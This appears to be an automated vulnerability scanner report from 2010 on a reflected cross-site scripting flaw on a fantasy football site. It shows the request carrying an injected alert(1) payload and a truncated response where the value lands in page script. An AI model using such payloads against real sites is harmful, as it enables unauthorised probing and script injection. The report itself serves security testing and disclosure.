1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://fantasyfootball |
Path: | / |
GET /?5646c"-alert(1)- Host: fantasyfootball.fanhouse Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 08:52:12 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=1000000 Connection: Keep-Alive Content-Type: text/html X-Pad: avoid browser bug Content-Length: 65589 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv ...[SNIP]... .com,mmafighting.net s_265.mmxgo = true; s_265.prop1="Fantasy Football"; s_265.prop2="Main"; s_265.prop9=""; s_265.prop12="http:/ s_265.prop17=""; s_265.prop19=""; s_265.prop22="StubHub"; s_265.prop21="commen var s_code=s_265.t();if(s ...[SNIP]... |